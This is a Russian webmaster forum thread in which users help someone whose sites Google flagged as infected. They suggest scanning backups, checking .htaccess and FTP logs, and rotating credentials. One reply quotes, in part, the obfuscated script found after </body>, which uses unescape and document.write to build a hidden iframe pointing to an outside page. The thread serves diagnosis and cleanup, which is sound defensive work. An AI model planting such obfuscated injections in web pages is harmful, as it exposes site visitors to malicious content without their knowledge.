- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Привет всем
У меня такая проблема
На днях гугле определил что на мох сайтах вирусы
_all-sciences.ru
_beztrawm.ru
_legion-web.com
_missbritneyspears.org
_pro-cemetn.ru
_subaru-wrx.ru
_ua-auto.ru
_ua-hosting.org
_ukr-auto.ru
но у мне ни одни антивирус вирусов на сайтах не определяет, кто что посоветует, и я не могу в ручную найти в коде ссылку на вирус, (каспер не видит)
прошу посоветуйте какое-то ПО.
Прошу отнестись с пониманием
Сделай бэкап, скачай на свой комп и сканируй антивирусами. Avira еще можно попробовать кроме касперского.
Либо ручками..или у хостера бэкап возьмите
ищи в конце фаила с именем index.* строчку начинающуюся с комментария. У себя аналогичную беду пофиксил за 15 минут. Гланое думай - откуда ноги растут.
просмотри .htaccess
На сайте _all-sciences.ru
в конце страниц (после </body></html>) такой код -
<script>document.write(unescape('%3C')+unescape('%69')+unescape('%66%72')+unescape('%61%6D')+unescape('%65%20%73%72')+unescape('%63%3D%22')+unescape('%68')+unescape('%74')+unescape('%74')+unescape('%70')+unescape('%3
...
%74%3D')+unescape('%22')+unescape('%30')+unescape('%22')+unescape('%20%66%72%61')+unescape('%6D%65%62%6F')+unescape('%72')+unescape('%64')+unescape('%65%72%3D')+unescape('%22%30')+unescape('%22%3E%3C')+unescape('%2F')+unescape('%69%66%72')+unescape('%61%6D%65%3E')+'');</script>
это и есть вирус закодированный 😎
нужно чистить ;)
просмотри .htaccess
О! А там-то что смотреть? жёсткий редирект?
Посмотри логи входов по FTP, есть вирусы которые воруют пароль приходит и перезаписывает все index.php добавляя вних свой код. Посмотри даты создания все index.php bkb html файлов, если дата создания свежая...и в одно время у всех, то это ВИРЬ!
Смените все пермишены на хостинг – FTP/SSH. Если вирус у вас – проверьте все сайты что были в конфигах программ: CuteFTP, Total Commander, Zend и т.д. + Само собой нужно пройтись и почистить сайты. Некоторые деятели кроме вставок еще бекдоры заливают, чтобы при смене FTP и дальше можно было вносить правки в файлы.
Не обязательно заражены только index файлы, лучше просмотреть все, отсортировав по дате изменений. С пол года назад была тема на форуме об этом.
То, что написал Kytyzov, присутствует на всех сайтах - скорее всего, это и есть зловред. Кроме того, у Вас то ли вручную вставлен, то ли скриптом подгружается контент, который сделан Microsoft Wordом - кроме того, что это сразу переводит сайт в разряд, извините, г-носайтов, возможно, Гугл плохо воспринимает бардачный код, который Word городит, когда в html сохраняется.
всем спасобо увидел,
разобрался